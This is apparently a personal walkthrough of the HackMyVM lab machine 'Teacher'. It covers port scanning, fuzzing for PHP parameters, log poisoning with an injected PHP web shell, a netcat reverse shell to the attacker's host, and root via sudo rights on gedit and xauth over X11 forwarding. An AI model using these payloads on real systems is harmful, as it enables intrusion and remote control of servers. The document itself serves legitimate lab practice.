NOTES ABOUT Teacher
[ 2022-09-30 ] [ HackMyVM / Teacher ]Status: Rooted
Skills: Port Scanning, Fuzzing, PHP, LFI, Log Poisoning, RCE, Reverse Shell, x11 Forwarding, xauth
Tools: nmap, wfuzz, shh
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.11
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 1e:21:69:d3:57:da:3a:04:0b:6f:f4:50:fb:97:13:10 (RSA)
| 256 36:ee:7f:57:1d:a5:b5:ce:1f:41:ba:b0:43:32:2e:ff (ECDSA)
|_ 256 f2:bd:80:dd:e5:05:02:49:c3:3b:9f:83:29:cb:54:96 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: Apache/2.4.54 (Debian)
GETTING IN
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -r 5 --hc 404 http://10.0.2.11/FUZZ
[...]
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000201: 200 2 L 2 W 12 Ch "log.php"
000002052: 200 0 L 2 W 12 Ch "access.php"
[...]
NOTE ‘14 CHARACTERS’ ON ID PAYLOAD
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -r 5 --hc 404 http://10.0.2.11/access.php?FUZZ=FUZZPAYLOAD:
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
[...]
000000158: 200 0 L 2 W 12 Ch "full_text - full_text"
000000155: 200 0 L 2 W 12 Ch "f - f"
000000160: 200 0 L 2 W 14 Ch "id - id"
000000162: 200 0 L 2 W 12 Ch "include - include"
[...]
http://10.0.2.11/access.php?id=%3C?php system($_GET["cmd"]); ?%3E
EXPLOIT REVERSE SHELL
http://10.0.2.11/log.php?cmd=nc%20-e%20/bin/bash%2010.0.2.15%20443
PDF FILE:
[ http://10.0.2.11/e14e1598b4271d8449e7fcda302b7975.pdf ]
$ ssh mrteacher@10.0.2.11
mrteacher@10.0.2.11\'s password:ThankYouTeacherssudo -l
[...]
User mrteacher may run the following commands on Teacher:
(ALL : ALL) NOPASSWD: /bin/gedit, /bin/xauth
[...]
dba-oracle.com:
"gedit can be called from a command line as long as
the terminal is open in an XWindows environment"
xauth
[ http://www.dba-oracle.com/t_linux_x_windows_mac_os.htm ]
$ ssh -v -X mrteacher@10.0.2.11
[...]
debug1: Requesting X11 forwarding with authentication spoofing.
[...]
$ /bin/gedit "run ok"
$ sudo /bin/gedit
[...]
debug1: channel 1: new [x11]
debug1: confirm x11
"X11 connection rejected because of wrong authentication."
debug1: channel 1: free: x11, nchannels 2
Unable to init server: Could not connect: Connection refused
[ x11-forwarding-ssh-connection-rejected-because-wrong-authentication ]
$ sudo /bin/xauth add $(xauth -f ~mrteacher/.Xauthority list | tail -1)
$ sudo /bin/gedit
debug1: client_input_channel_open: ctype x11 rchan 3 win 65536 max 16384
debug1: client_request_x11: request from ::1 56654
debug1: channel 1: new [x11]
"debug1: confirm x11"
READ ROOT FLAG.